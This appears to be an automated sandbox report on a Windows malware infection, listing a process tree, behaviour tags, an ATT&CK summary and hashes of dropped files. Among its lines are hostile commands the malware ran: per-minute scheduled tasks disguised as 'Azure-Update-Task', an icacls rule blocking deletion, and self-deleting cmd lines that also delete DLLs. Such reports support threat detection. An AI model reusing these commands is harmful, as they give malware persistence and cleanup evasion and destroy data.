C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --mojo-platform-channel-handle=2628 /prefetch:85⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_BE28.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites' -retry_count 10"3⤵
-
C:\Users\Admin\AppData\Local\Temp\E92.exeC:\Users\Admin\AppData\Local\Temp\E92.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\E92.exeC:\Users\Admin\AppData\Local\Temp\E92.exe2⤵
- Loads dropped DLL
- Adds Run key to start application
- Modifies registry class
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\c87fca11-df42-4068-9725-e8952d115011" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\E92.exe"C:\Users\Admin\AppData\Local\Temp\E92.exe" --Admin IsNotAutoStart IsNotTask3⤵
-
C:\Users\Admin\AppData\Local\Temp\E92.exe"C:\Users\Admin\AppData\Local\Temp\E92.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\54da30f7-f046-451b-8ac4-be7013a9e42f\build2.exe"C:\Users\Admin\AppData\Local\54da30f7-f046-451b-8ac4-be7013a9e42f\build2.exe"5⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\54da30f7-f046-451b-8ac4-be7013a9e42f\build2.exe"C:\Users\Admin\AppData\Local\54da30f7-f046-451b-8ac4-be7013a9e42f\build2.exe"6⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\54da30f7-f046-451b-8ac4-be7013a9e42f\build2.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\54da30f7-f046-451b-8ac4-be7013a9e42f\build3.exe"C:\Users\Admin\AppData\Local\54da30f7-f046-451b-8ac4-be7013a9e42f\build3.exe"5⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\54da30f7-f046-451b-8ac4-be7013a9e42f\build3.exe"C:\Users\Admin\AppData\Local\54da30f7-f046-451b-8ac4-be7013a9e42f\build3.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\1E72.exeC:\Users\Admin\AppData\Local\Temp\1E72.exe1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 8028 -s 10042⤵
- Program crash
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Users\Admin\AppData\Local\Temp\1EAD.exeC:\Users\Admin\AppData\Local\Temp\1EAD.exe1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffd59ec4f50,0x7ffd59ec4f60,0x7ffd59ec4f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1616,18351935695019404465,11045670740359552499,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1628 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,18351935695019404465,11045670740359552499,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1688 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1616,18351935695019404465,11045670740359552499,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2240 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,18351935695019404465,11045670740359552499,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2544 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,18351935695019404465,11045670740359552499,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2636 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,18351935695019404465,11045670740359552499,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3080 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,18351935695019404465,11045670740359552499,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,18351935695019404465,11045670740359552499,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,18351935695019404465,11045670740359552499,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4580 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,18351935695019404465,11045670740359552499,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,18351935695019404465,11045670740359552499,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3620 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1616,18351935695019404465,11045670740359552499,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1972 /prefetch:22⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k wsappx -s AppXSvc1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x3e41⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\5c11f00dc47c4ef4a33a6a42217482b9 /t 5052 /p 74801⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Users\Admin\AppData\Local\Temp\650D.exeC:\Users\Admin\AppData\Local\Temp\650D.exe1⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\650D.exe"2⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\fgYoUKj95C.exe"C:\Users\Admin\AppData\Local\Temp\fgYoUKj95C.exe"2⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"3⤵
- Creates scheduled task(s)
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
-
C:\EEK\Start Emergency Kit Scanner.exe"C:\EEK\Start Emergency Kit Scanner.exe"2⤵
-
C:\EEK\bin64\a2emergencykit.exe"C:\EEK\bin64\a2emergencykit.exe"3⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x0 /state0:0xa3a6a055 /state1:0x41c64e6d1⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x0 /state0:0xa3a6d055 /state1:0x41c64e6d1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Modify Registry
6Disabling Security Tools
3Virtualization/Sandbox Evasion
1File Permissions Modification
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Company\NewProduct\customer3.exeMD5
1daac0c9a48a79976539b0722f9c3d3b
SHA1843218f70a6a7fd676121e447b5b74acb0d87100
SHA256e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf
SHA5122259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc
-
C:\Program Files (x86)\Company\NewProduct\customer3.exeMD5
1daac0c9a48a79976539b0722f9c3d3b
SHA1843218f70a6a7fd676121e447b5b74acb0d87100
SHA256e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf
SHA5122259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exeMD5
aed57d50123897b0012c35ef5dec4184
SHA1568571b12ca44a585df589dc810bf53adf5e8050
SHA256096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e
SHA512ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exeMD5
aed57d50123897b0012c35ef5dec4184
SHA1568571b12ca44a585df589dc810bf53adf5e8050
SHA256096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e
SHA512ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeMD5
3c7117f96c0c2879798a78a32d5d34cc
SHA1197c7dea513f8cbb7ebc17610f247d774c234213
SHA2566e17c993f42fcc005867e0fd33f98cae32726571d18f6dd8b9b06cefb82de162
SHA512b89573ac6cbbe132c0c4bac009904cba6d5fda9b4d4eebe2d9552f2451acdd8b7b8e8dce663b26f6541c9c124eb5b9f468efd23b35a28047b0cb942f3a90c122
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeMD5
3c7117f96c0c2879798a78a32d5d34cc
SHA1197c7dea513f8cbb7ebc17610f247d774c234213
SHA2566e17c993f42fcc005867e0fd33f98cae32726571d18f6dd8b9b06cefb82de162
SHA512b89573ac6cbbe132c0c4bac009904cba6d5fda9b4d4eebe2d9552f2451acdd8b7b8e8dce663b26f6541c9c124eb5b9f468efd23b35a28047b0cb942f3a90c122
-
C:\ProgramData\Runtimebroker.exeMD5
23dd844a82d3caf47e8a1b13f917b89d
SHA1f263b6b43b18586ce89af6873da8af260505d6de
SHA25630715cfa9a065a5487098b26e563339ce8c1d12e468f9e418106cae9713eb7d6
SHA512c765d4a32ef5d5a03c1e57b2eadc0152c4b2ab4a19f108e9d407d592e12beebe2919c9e3827e67c3dbb675ae8a2ac500d3c998ef87d4987a4ee15195885ae083
-
C:\ProgramData\Runtimebroker.exeMD5
23dd844a82d3caf47e8a1b13f917b89d
SHA1f263b6b43b18586ce89af6873da8af260505d6de
SHA25630715cfa9a065a5487098b26e563339ce8c1d12e468f9e418106cae9713eb7d6
SHA512c765d4a32ef5d5a03c1e57b2eadc0152c4b2ab4a19f108e9d407d592e12beebe2919c9e3827e67c3dbb675ae8a2ac500d3c998ef87d4987a4ee15195885ae083
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27MD5
b1984c142d178dd4a7d8bc5472e766a1
SHA1e15c3d475cfb3ace05f288ff4931d606d979677a
SHA25635e33ce28b54798ff9a160924bf9eb3717e0fe4fb1c1c150d6875715e6bc52f5
SHA512936150262ac34949f68df02e809a8733ace1aa0d924f967cf226c0b23f45c80ee277c75d9b1d41f5131fcbe09047a6d3b7f84cdf86d6018ea5731465e605d0e8
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27MD5
0b5a6cab89039f6a65e745717cdc67ad
SHA111b002f7d5b16d5fcc96b5350e6c5285e4d7c4eb
SHA256b63e225a90924e5f50c52b41d72f41dd1c40ee21e9880982261fd61f2c743198
SHA512cb6cba0183ec24951d198aeb1dff6797fa6ef05e1e2eb65aaec8014cb2e5cff43a96a12d385f1039b14bc61f28f631e2a86213f6b8602f98588217d414bd6dec
-
C:\Users\Admin\AppData\Local\Temp\b79de8f8-c625-4e13-81cf-f519955346b0\AdvancedRun.exeMD5
17fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
C:\Users\Admin\AppData\Local\Temp\b79de8f8-c625-4e13-81cf-f519955346b0\AdvancedRun.exeMD5
17fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
C:\Users\Admin\AppData\Local\Temp\b79de8f8-c625-4e13-81cf-f519955346b0\AdvancedRun.exeMD5
17fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
C:\Users\Admin\AppData\Local\Temp\is-7UAAI.tmp\DJCJOECZVtp5ltvQQsObO2H9.tmpMD5
ffcf263a020aa7794015af0edee5df0b
SHA1bce1eb5f0efb2c83f416b1782ea07c776666fdab
SHA2561d07cfb7104b85fc0dffd761f6848ad176117e146bbb4079fe993efa06b94c64
SHA51249f2b062adfb99c0c7f1012c56f0b52a8850d9f030cc32073b90025b372e4eb373f06a351e9b33264967427b8174c060c8a6110979f0eaf0872f7da6d5e4308a
-
C:\Users\Admin\DOCUME~1\EXYNYN~1.TMPMD5
5f6b54c7faf0792d8a0865bc8fa7cb9b
SHA1bd388b180395969175ae397a900ed5e4f544f076
SHA2560341215d8c5cf17b21d715cb6ba53addb03faa735ee888d107adc4497a78982f
SHA5129ce88b2b81c3c868e3cbbe11ea7f5ebdc72c209b66bc8006ac2f6068a5c216703ec82659a98db28780d517cabd7da7be2f6f22a160b44d81664c82b09e67c421
-
C:\Users\Admin\Documents\1VdiHrPxB6a9VE3w3CWHv7XU.exeMD5
f727ff82991b8be8fa3cb310d97838bc
SHA1f47252c7df601facaf5da1b6105d9f8cf1c958bf
SHA25652769186647b50add7fb7f60d66df5c84838790bf57759be83fa39fde969586f
SHA512bcd2979e2d4ecc7f7d8579214fe6891255bf53e18336f7494a9eea986e609da921329c49ed19182d4b7efe06fbac65dc1eca22029c785ece06be1d956e3d04d8
-
C:\Users\Admin\Documents\1VdiHrPxB6a9VE3w3CWHv7XU.exeMD5
f727ff82991b8be8fa3cb310d97838bc
SHA1f47252c7df601facaf5da1b6105d9f8cf1c958bf
SHA25652769186647b50add7fb7f60d66df5c84838790bf57759be83fa39fde969586f
SHA512bcd2979e2d4ecc7f7d8579214fe6891255bf53e18336f7494a9eea986e609da921329c49ed19182d4b7efe06fbac65dc1eca22029c785ece06be1d956e3d04d8
-
C:\Users\Admin\Documents\24EijN8ARjd6ySPoevmYqMMj.exeMD5
f5881584c73a9416a65cbc5ca849f5bb
SHA1e50f322a92332202299fbd9b38e0ccd793058133
SHA256fe5254468c8a6c7a17dc11f3e85b00db1b5b2b3c26919bdefb8d917ce35cb4d5
SHA5124e608be3de18065f89ae0144ccb46378a26cf15e61f739a338bf5f544b1060a8c800549256d17bb741c140dd68b0fc0c8bbc1c392b4824524dbfb7409bc2b168
-
C:\Users\Admin\Documents\24EijN8ARjd6ySPoevmYqMMj.exeMD5
f5881584c73a9416a65cbc5ca849f5bb
SHA1e50f322a92332202299fbd9b38e0ccd793058133
SHA256fe5254468c8a6c7a17dc11f3e85b00db1b5b2b3c26919bdefb8d917ce35cb4d5
SHA5124e608be3de18065f89ae0144ccb46378a26cf15e61f739a338bf5f544b1060a8c800549256d17bb741c140dd68b0fc0c8bbc1c392b4824524dbfb7409bc2b168
-
C:\Users\Admin\Documents\27kSZAfpnLjWG5bu37BpjxfH.exeMD5
f727ff82991b8be8fa3cb310d97838bc
SHA1f47252c7df601facaf5da1b6105d9f8cf1c958bf
SHA25652769186647b50add7fb7f60d66df5c84838790bf57759be83fa39fde969586f
